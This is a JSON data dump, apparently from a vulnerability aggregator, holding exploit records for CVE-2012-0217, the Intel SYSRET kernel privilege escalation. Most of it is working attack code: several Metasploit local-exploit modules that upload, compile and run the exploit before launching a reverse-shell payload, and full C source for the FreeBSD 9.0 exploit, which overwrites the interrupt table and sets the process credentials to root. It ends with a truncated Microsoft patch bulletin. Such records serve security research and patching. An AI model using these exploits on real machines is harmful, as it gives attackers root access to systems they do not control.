'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation']\r\n ],\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}]\r\n ],\r\n 'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' },\r\n 'DefaultTarget' => 0))\r\n register_advanced_options [\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def upload_and_compile(path, data, gcc_args='')\r\n upload \"#{path}.c\", data\r\n\r\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n\r\n register_file_for_cleanup path\r\n chmod path\r\n end\r\n\r\n def exploit_data(file)\r\n ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-0217', file)\r\n end\r\n\r\n def is_root?\r\n (cmd_exec('id -u').to_s.gsub(/[^\\d]/, '') == '0')\r\n end\r\n\r\n def strip_comments(c_code)\r\n c_code.gsub(%r{/\\*.*?\\*/}m, '').gsub(%r{^\\s*//.*$}, '')\r\n end\r\n\r\n def check\r\n kernel_release = cmd_exec('uname -r').to_s\r\n unless kernel_release =~ /^(8\\.3|9\\.0)-RELEASE/\r\n vprint_error \"FreeBSD version #{kernel_release} is not vulnerable\"\r\n return Exploit::CheckCode::Safe\r\n end\r\n vprint_good \"FreeBSD version #{kernel_release} appears vulnerable\"\r\n\r\n arch = cmd_exec('uname -m').to_s\r\n unless arch.include? '64'\r\n vprint_error \"System architecture #{arch} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System architecture #{arch} is supported\"\r\n\r\n hw_model = cmd_exec('/sbin/sysctl hw.model').to_s\r\n unless hw_model.downcase.include? 'intel'\r\n vprint_error \"#{hw_model} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{hw_model} is vulnerable\"\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Appears\r\n unless datastore['ForceExploit']\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\r\n end\r\n print_warning 'Target does not appear to be vulnerable'\r\n end\r\n\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\r\n end\r\n end\r\n\r\n unless writable? base_dir\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n # Upload and compile exploit executable\r\n executable_name = \".#{rand_text_alphanumeric 5..10}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n upload_and_compile executable_path, strip_comments(exploit_data('sysret.c')), '-Wall'\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Launch exploit\r\n print_status 'Launching exploit...'\r\n output = cmd_exec executable_path\r\n output.each_line { |line| vprint_status line.chomp }\r\n\r\n unless is_root?\r\n fail_with Failure::Unknown, 'Exploitation failed'\r\n end\r\n print_good \"Success! Executing payload...\"\r\n\r\n cmd_exec payload_path\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/46508"}, {"lastseen": "2016-02-02T15:09:46", "description": "Microsoft Windows Kernel Intel x64 SYSRET PoC. CVE-2012-0217. Local exploit for win64 platform", "published": "2012-08-27T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Kernel Intel x64 SYSRET PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "modified": "2012-08-27T00:00:00", "id": "EDB-ID:20861", "href": "https://www.exploit-db.com/exploits/20861/", "sourceData": "Source: http://packetstormsecurity.org/files/115908/sysret.rar\r\n\r\nThis is proof of concept code that demonstrates the Microsoft Windows kernel (Intel/x64) SYSRET vulnerability as described in MS12-042. The shellcode disables code signing and will grant NT SYSTEM privileges to a specified application or already running process.\r\n\r\nExploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20861.rar\r\n\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20861/"}, {"lastseen": "2016-02-03T08:46:10", "description": "FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation Exploit. CVE-2012-0217. Local exploit for freebsd platform", "published": "2013-10-04T00:00:00", "type": "exploitdb", "title": "FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "modified": "2013-10-04T00:00:00", "id": "EDB-ID:28718", "href": "https://www.exploit-db.com/exploits/28718/", "sourceData": "/*\r\n * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit\r\n * Author by CurcolHekerLink\r\n * \r\n * This exploit based on open source project, I can make it open source too. Right?\r\n * \r\n * If you blaming me for open sourcing this exploit, you can fuck your mom. Free of charge :)\r\n *\r\n * Credits to KEPEDEAN Corp, Barisan Sakit Hati, ora iso sepaying meneh hekerlink,\r\n * Kismin perogeremer cyber team, petboylittledick, 1337 Curhat Crew and others at #MamaDedehEliteCurhatTeam\r\n * if you would like next private exploit leakage, just mention @MamahhDedeh\r\n *\r\n * Some people may feel harmed when we release this exploit :))\r\n *\r\n * p.s: Met idul Adha ya besok, saatnya potong leher dewa lo... eh maksudnya potong Sapisisasi :))\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <sys/mman.h>\r\n#include <machine/cpufunc.h>\r\n#define _WANT_UCRED\r\n#include <sys/proc.h>\r\n#include <machine/segments.h>\r\n#include <sys/param.h>\r\n#include <sys/linker.h>\r\n#define TRIGGERSIZE 20\r\n#define BOUNCESIZE 18\r\n\r\nuintptr_t Xdivp, Xdbgp, Xbptp, Xoflp, Xbndp, Xillp, Xdnap, Xfpusegmp, Xtssp, Xmissingp, Xstkp, Xprotp, Xpagep, Xfpup, Xalignp, Xmchkp, Xxmmp;\r\n\r\nstruct gate_descriptor * sidt()\r\n{\r\n\tstruct region_descriptor idt;\r\n\tasm (\"sidt %0\": \"=m\"(idt));\r\n\treturn (struct gate_descriptor*)idt.rd_base;\r\n}\r\n\r\nu_long matchsym(char *symname)\r\n{\r\n\tstruct kld_sym_lookup ksym;\r\n\tksym.version = sizeof (ksym);\r\n\tksym.symname = symname;\r\n\tif (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {\r\n\t\tperror(\"kldsym\");\r\n\t\texit(1);\r\n\t}\r\n\treturn ksym.symvalue;\r\n}\r\n\r\nvoid setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)\r\n{\r\n\tstruct gate_descriptor *ip;\r\n\tip = idt + idx;\r\n\tip->gd_looffset = func;\r\n\tip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);\r\n\tip->gd_ist = ist;\r\n\tip->gd_xx = 0;\r\n\tip->gd_type = typ;\r\n\tip->gd_dpl = dpl;\r\n\tip->gd_p = 1;\r\n\tip->gd_hioffset = func>>16;\r\n}\r\n\r\nvoid payload()\r\n{\r\n\tprintf(\"[+] Woohoo!!!\\n\");\r\n\texit(0);\r\n}\r\n\r\nvoid resetidt()\r\n{\r\n\tstruct thread *td;\r\n\tstruct ucred *cred;\r\n\tstruct gate_descriptor *idt = sidt();\r\n\tsetidt(idt, IDT_DE, Xdivp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_DB, Xdbgp, SDT_SYSIGT, SEL_KPL, 0);\t\r\n\tsetidt(idt, IDT_BP, Xbptp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_OF, Xoflp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_BR, Xbndp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_UD, Xillp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_NM, Xdnap, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_FPUGP, Xfpusegmp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_TS, Xtssp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_NP, Xmissingp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_SS, Xstkp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_GP, Xprotp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_PF, Xpagep, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_MF, Xfpup, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_AC, Xalignp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_MC, Xmchkp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_XF, Xxmmp, SDT_SYSIGT, SEL_KPL, 0);\r\n\t\r\n\tasm (\"mov %%gs:0, %0\" : \"=r\"(td));\r\n\t\r\n\tcred = td->td_proc->p_ucred;\r\n\tcred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;\r\n\tcred->cr_groups[0] = 0;\r\n\t\r\n\tasm (\"swapgs; sysretq;\" :: \"c\"(payload));\r\n}\r\n\r\nvoid resolving()\r\n{\r\n\tXdivp = (uintptr_t)matchsym(\"Xdiv\");\r\n\tXdbgp = (uintptr_t)matchsym(\"Xdbg\");\r\n\tXbptp = (uintptr_t)matchsym(\"Xbpt\");\r\n\tXoflp = (uintptr_t)matchsym(\"Xofl\");\r\n\tXbndp = (uintptr_t)matchsym(\"Xbnd\");\r\n\tXillp = (uintptr_t)matchsym(\"Xill\");\r\n\tXdnap = (uintptr_t)matchsym(\"Xdna\");\r\n\tXfpusegmp = (uintptr_t)matchsym(\"Xfpusegm\");\r\n\tXtssp = (uintptr_t)matchsym(\"Xtss\");\r\n\tXmissingp = (uintptr_t)matchsym(\"Xmissing\");\r\n\tXstkp = (uintptr_t)matchsym(\"Xstk\");\r\n\tXprotp = (uintptr_t)matchsym(\"Xprot\");\r\n\tXpagep = (uintptr_t)matchsym(\"Xpage\");\r\n\tXfpup = (uintptr_t)matchsym(\"Xfpu\");\r\n\tXalignp = (uintptr_t)matchsym(\"Xalign\");\r\n\tXmchkp = (uintptr_t)matchsym(\"Xmchk\");\r\n\tXxmmp = (uintptr_t)matchsym(\"Xxmm\");\r\n}\r\n\r\nvoid trigger()\r\n{\r\n\tprintf(\"[+] Crotz...\\n\");\r\n\tuint64_t pagesize = getpagesize();\r\n\tuint8_t * mappedarea = (uint8_t*)((1ULL << 47) - pagesize);\r\n\tmappedarea = mmap(mappedarea, pagesize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);\r\n\tif (mappedarea == MAP_FAILED) {\r\n\t\tperror(\"mmap (trigger)\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tchar triggerpayload[] =\r\n\t\t\"\\xb8\\x18\\x00\\x00\\x00\"\r\n\t\t\"\\x48\\x89\\xe3\"\r\n\t\t\"\\x48\\xbc\\xef\\xbe\\xad\\xde\\xef\\xbe\\xad\\xde\"\r\n\t\t\"\\x0f\\x05\";\r\n\r\n\tuint8_t * offset_addr = mappedarea + pagesize - TRIGGERSIZE;\r\n\tmemcpy(offset_addr, triggerpayload, TRIGGERSIZE);\r\n\r\n\t*(uint64_t*)(offset_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);\r\n\tprintf(\"[+] Crotz...\\n\");\r\n\tchar bouncepayload[] =\r\n\t\t\"\\x0f\\x01\\xf8\"\r\n\t\t\"\\x48\\x89\\xdc\"\r\n\t\t\"\\x48\\xb8\\xef\\xbe\\xad\\xde\\xef\\xbe\\xad\\xde\"\r\n\t\t\"\\xff\\xe0\";\r\n\r\n\tuint8_t * bouncer = (uint8_t*)(0x900000000 | (Xpagep & 0xFFFFFFFF));\r\n\tsize_t bouncer_allocsize = pagesize;\r\n\tif ((uint8_t*)((uint64_t)bouncer & ~(pagesize-1)) + pagesize < bouncer + BOUNCESIZE)\r\n\t\tbouncer_allocsize += pagesize;\r\n\tif (mmap((void*)((uint64_t)bouncer & ~(pagesize-1)), bouncer_allocsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)\r\n\t{\r\n\t\tperror(\"mmap (bouncer)\");\r\n\t\texit(1);\r\n\t}\r\n\tmemcpy(bouncer, bouncepayload, BOUNCESIZE);\r\n\t*(uint64_t*)(bouncer + 8) = (uint64_t)resetidt;\r\n\t((void (*)())offset_addr)();\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tprintf(\"[+] SYSRET FUCKUP!!\\n\");\r\n\tprintf(\"[+] Start Engine...\\n\");\r\n\tresolving();\r\n\tprintf(\"[+] Crotz...\\n\");\r\n\ttrigger();\r\n\treturn 0;\r\n}\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/28718/"}], "packetstorm": [{"lastseen": "2019-03-07T11:22:21", "description": "", "published": "2019-03-07T00:00:00", "type": "packetstorm", "title": "FreeBSD Intel SYSRET Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "modified": "2019-03-07T00:00:00", "id": "PACKETSTORM:152001", "href": "https://packetstormsecurity.com/files/152001/FreeBSD-Intel-SYSRET-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GreatRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'FreeBSD Intel SYSRET Privilege Escalation', \n'Description' => %q{ \nThis module exploits a vulnerability in the FreeBSD kernel, \nwhen running on 64-bit Intel processors. \n \nBy design, 64-bit processors following the X86-64 specification will \ntrigger a general protection fault (GPF) when executing a SYSRET \ninstruction with a non-canonical address in the RCX register. \n \nHowever, Intel processors check for a non-canonical address prior to \ndropping privileges, causing a GPF in privileged mode. As a result, \nthe current userland RSP stack pointer is restored and executed, \nresulting in privileged code execution. \n \nThis module has been tested successfully on: \n \nFreeBSD 8.3-RELEASE (amd64); and \nFreeBSD 9.0-RELEASE (amd64). \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Rafal Wojtczuk', # Discovery \n'John Baldwin', # Discovery \n'iZsh', # Exploit \n'bcoles' # Metasploit \n], \n'DisclosureDate' => '2012-06-12', \n'Platform' => ['bsd'], \n'Arch' => [ARCH_X64], \n'SessionTypes' => ['shell'], \n'References' => \n[ \n['BID', '53856'], \n['CVE', '2012-0217'], \n['EDB', '28718'], \n['PACKETSTORM', '113584'], \n['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'], \n['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'], \n['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'], \n['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'], \n['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'], \n['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation'] \n], \n'Targets' => \n[ \n['Automatic', {}] \n], \n'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' }, \n'DefaultTarget' => 0)) \nregister_advanced_options [ \nOptBool.new('ForceExploit', [false, 'Override check result', false]), \nOptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) \n] \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nrm_f path \nwrite_file path, data \nregister_file_for_cleanup path \nend \n \ndef upload_and_chmodx(path, data) \nupload path, data \ncmd_exec \"chmod +x '#{path}'\" \nend \n \ndef upload_and_compile(path, data, gcc_args='') \nupload \"#{path}.c\", data \n \ngcc_cmd = \"gcc -o #{path} #{path}.c\" \nif session.type.eql? 'shell' \ngcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\" \nend \noutput = cmd_exec gcc_cmd \n \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{path}.c failed to compile\" \nend \n \nregister_file_for_cleanup path \nchmod path \nend \n \ndef exploit_data(file) \n::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-0217', file) \nend \n \ndef is_root? \n(cmd_exec('id -u').to_s.gsub(/[^\\d]/, '') == '0') \nend \n \ndef strip_comments(c_code) \nc_code.gsub(%r{/\\*.*?\\*/}m, '').gsub(%r{^\\s*//.*$}, '') \nend \n \ndef check \nkernel_release = cmd_exec('uname -r').to_s \nunless kernel_release =~ /^(8\\.3|9\\.0)-RELEASE/ \nvprint_error \"FreeBSD version #{kernel_release} is not vulnerable\" \nreturn Exploit::CheckCode::Safe \nend \nvprint_good \"FreeBSD version #{kernel_release} appears vulnerable\" \n \narch = cmd_exec('uname -m').to_s \nunless arch.include? '64' \nvprint_error \"System architecture #{arch} is not supported\" \nreturn CheckCode::Safe \nend \nvprint_good \"System architecture #{arch} is supported\" \n \nhw_model = cmd_exec('/sbin/sysctl hw.model').to_s \nunless hw_model.downcase.include? 'intel' \nvprint_error \"#{hw_model} is not vulnerable\" \nreturn CheckCode::Safe \nend \nvprint_good \"#{hw_model} is vulnerable\" \n \nCheckCode::Appears \nend \n \ndef exploit \nunless check == CheckCode::Appears \nunless datastore['ForceExploit'] \nfail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' \nend \nprint_warning 'Target does not appear to be vulnerable' \nend \n \nif is_root? \nunless datastore['ForceExploit'] \nfail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' \nend \nend \n \nunless writable? base_dir \nfail_with Failure::BadConfig, \"#{base_dir} is not writable\" \nend \n \n# Upload and compile exploit executable \nexecutable_name = \".#{rand_text_alphanumeric 5..10}\" \nexecutable_path = \"#{base_dir}/#{executable_name}\" \nupload_and_compile executable_path, strip_comments(exploit_data('sysret.c')), '-Wall' \n \n# Upload payload executable \npayload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\" \nupload_and_chmodx payload_path, generate_payload_exe \n \n# Launch exploit \nprint_status 'Launching exploit...' \noutput = cmd_exec executable_path \noutput.each_line { |line| vprint_status line.chomp } \n \nunless is_root? \nfail_with Failure::Unknown, 'Exploitation failed' \nend \nprint_good \"Success! Executing payload...\" \n \ncmd_exec payload_path \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152001/intel_sysret_priv_esc.rb.txt"}], "metasploit": [{"lastseen": "2020-10-01T22:09:55", "description": "This module exploits a vulnerability in the FreeBSD kernel, when running on 64-bit Intel processors. By design, 64-bit processors following the X86-64 specification will trigger a general protection fault (GPF) when executing a SYSRET instruction with a non-canonical address in the RCX register. However, Intel processors check for a non-canonical address prior to dropping privileges, causing a GPF in privileged mode. As a result, the current userland RSP stack pointer is restored and executed, resulting in privileged code execution. This module has been tested successfully on: FreeBSD 8.3-RELEASE (amd64); and FreeBSD 9.0-RELEASE (amd64).\n", "published": "2018-12-09T16:04:38", "type": "metasploit", "title": "FreeBSD Intel SYSRET Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "modified": "2020-07-18T23:31:34", "id": "MSF:EXPLOIT/FREEBSD/LOCAL/INTEL_SYSRET_PRIV_ESC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Post::File\n include Msf::Post::Unix\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'FreeBSD Intel SYSRET Privilege Escalation',\n 'Description' => %q{\n This module exploits a vulnerability in the FreeBSD kernel,\n when running on 64-bit Intel processors.\n\n By design, 64-bit processors following the X86-64 specification will\n trigger a general protection fault (GPF) when executing a SYSRET\n instruction with a non-canonical address in the RCX register.\n\n However, Intel processors check for a non-canonical address prior to\n dropping privileges, causing a GPF in privileged mode. As a result,\n the current userland RSP stack pointer is restored and executed,\n resulting in privileged code execution.\n\n This module has been tested successfully on:\n\n FreeBSD 8.3-RELEASE (amd64); and\n FreeBSD 9.0-RELEASE (amd64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Rafal Wojtczuk', # Discovery\n 'John Baldwin', # Discovery\n 'iZsh', # Exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2012-06-12',\n 'Platform' => ['bsd'], # FreeBSD\n 'Arch' => [ARCH_X64],\n 'SessionTypes' => ['shell'],\n 'References' =>\n [\n ['BID', '53856'],\n ['CVE', '2012-0217'],\n ['EDB', '28718'],\n ['PACKETSTORM', '113584'],\n ['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'],\n ['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'],\n ['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'],\n ['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'],\n ['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'],\n ['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation']\n ],\n 'Targets' =>\n [\n ['Automatic', {}]\n ],\n 'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' },\n 'DefaultTarget' => 0\n )\n )\n register_advanced_options([\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ])\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status(\"Writing '#{path}' (#{data.size} bytes) ...\")\n rm_f(path)\n write_file(path, data)\n register_file_for_cleanup(path)\n end\n\n def upload_and_compile(path, data, _cc_args = '')\n upload(\"#{path}.c\", data)\n\n cc_cmd = \"cc -o #{path} #{path}.c\"\n if session.type.eql?('shell')\n cc_cmd = \"PATH=$PATH:/usr/bin/ #{cc_cmd}\"\n end\n output = cmd_exec(cc_cmd)\n\n unless output.blank?\n print_error(output)\n fail_with(Failure::Unknown, \"#{path}.c failed to compile\")\n end\n\n register_file_for_cleanup(path)\n chmod(path)\n end\n\n def strip_comments(c_code)\n c_code.gsub(%r{/\\*.*?\\*/}m, '').gsub(%r{^\\s*//.*$}, '')\n end\n\n def check\n kernel_release = cmd_exec('uname -r').to_s\n unless kernel_release =~ /^(8\\.3|9\\.0)-RELEASE/\n return CheckCode::Safe(\"FreeBSD version #{kernel_release} is not vulnerable\")\n end\n vprint_good(\"FreeBSD version #{kernel_release} appears vulnerable\")\n\n kernel_arch = cmd_exec('uname -m').to_s\n unless kernel_arch.include?('64')\n return CheckCode::Safe(\"System architecture #{kernel_arch} is not supported\")\n end\n vprint_good(\"System architecture #{kernel_arch} is supported\")\n\n hw_model = cmd_exec('/sbin/sysctl hw.model').to_s\n unless hw_model.downcase.include?('intel')\n return CheckCode::Safe(\"#{hw_model} is not vulnerable\")\n end\n vprint_good(\"#{hw_model} is vulnerable\")\n\n CheckCode::Appears\n end\n\n def exploit\n if is_root?\n unless datastore['ForceExploit']\n fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')\n end\n end\n\n unless writable?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\n end\n\n # Upload and compile exploit executable\n executable_name = \".#{rand_text_alphanumeric(5..10)}\"\n executable_path = \"#{base_dir}/#{executable_name}\"\n upload_and_compile(executable_path, strip_comments(exploit_data('cve-2012-0217', 'sysret.c')), '-Wall')\n\n # Upload payload executable\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\"\n upload_and_chmodx(payload_path, generate_payload_exe)\n\n # Launch exploit\n print_status('Launching exploit...')\n output = cmd_exec(executable_path)\n output.each_line { |line| vprint_status line.chomp }\n\n unless is_root?\n fail_with(Failure::Unknown, 'Exploitation failed')\n end\n print_good('Success! Executing payload...')\n\n cmd_exec(\"#{payload_path} & echo \")\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/freebsd/local/intel_sysret_priv_esc.rb"}], "mskb": [{"lastseen": "2021-01-01T22:53:09", "bulletinFamily": "microsoft", "cvelist": ["CVE-2012-0217", "CVE-2012-1515"], "description": "<html><body><p>Resolves vulnerabilities in Microsoft Windows that could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that exploits the vulnerability. An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.</p><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS12-042. To view the complete security bulletin, visit one of the following Microsoft websites:<br/><ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201206.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201206.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms12-042\" id=\"kb-link-3\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS12-042</a></div></li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues and additional information about this security update</h3> <br/> The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information. If this is the case, the known issue is listed below each article link.<br/><br/><br/><ul class=\"sbody-free_list\"><li><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2707511\" id=\"kb-link-8\">2707511 </a> MS12-042: Description of the security update for Windows XP and Windows Server 2003: June 12, 2012</div></li><li><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2709715\" id=\"kb-link-9\">2709715 </a> MS12-042: Description of the security update for Windows 7, Windows Server 2008 R2 2010, Windows Vista and Windows Server 2008: June 12, 2012</div></li></ul></div><h2>File hash table</h2><div class=\"kb-summary-section section\">The following table lists the thumbprints of the certificates that are used to sign the security updates. Verify the certificate thumbprint in this Knowledge Base article against the certificate thumbprint that is indicated on the security update that you download. <div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Publisher file name</span></td><td class=\"sbody-td\"><span class=\"text-base\">Sha1</span></td><td class=\"sbody-td\"><span class=\"text-base\">SHA2</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-ia64-enu.exe</td><td class=\"sbody-td\">7F99E4B339653A9E947F85C04103C495BA8A97EB</td><td 